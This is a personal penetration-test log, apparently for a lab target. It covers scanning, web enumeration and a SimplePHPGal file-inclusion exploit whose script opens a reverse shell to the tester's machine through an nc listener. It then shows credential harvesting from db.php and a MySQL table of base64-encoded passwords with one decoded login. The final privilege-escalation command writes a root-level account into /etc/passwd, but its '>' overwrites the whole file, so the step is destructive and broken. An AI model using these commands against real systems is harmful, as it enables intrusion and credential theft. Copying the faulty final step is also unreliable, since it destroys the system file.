Snookums

๐Ÿงช Pentest Log: {{date:2025-08-03}}

๐Ÿ” Target Information

ip=192.168.176.58

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 21

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

feroxbuster --url http://$ip

wpscan -url http://$ip

dirsearch -u http://$ip -r -o dirsearch.txt

nikto -h http://$ip

found SimplePHPGal 0.7 - Remote File Inclusion

Port 111

rpcclient -U '' -N $ip

Port 139, 445

smbclient -L \\\\$ip\\

enum4linux -a $ip

smbclient \\\\$ip\\SYSVOL -U enox -c 'recurse;ls'

Port 3306

Port 33060

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://github.com/beauknowstech/SimplePHPGal-RCE.py

python3 SimplePHPGal-RCE.py http://$ip/ 192.168.45.163 33060

nc -lvnp 33060

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

MySQL:

cat db.php

found

<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');
define('DBNAME', 'SimplePHPGal');
?>

login mysql

mysql -u root -p

found three encoded passwords

+----------+----------------------------------------------+
| username | password                                     |
+----------+----------------------------------------------+
| josh     | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael  | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==     |
| serena   | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==     |
+----------+----------------------------------------------+

crack it with CyberChef

michael:HockSydneyCertify123

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

echo 'tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /etc/passwd;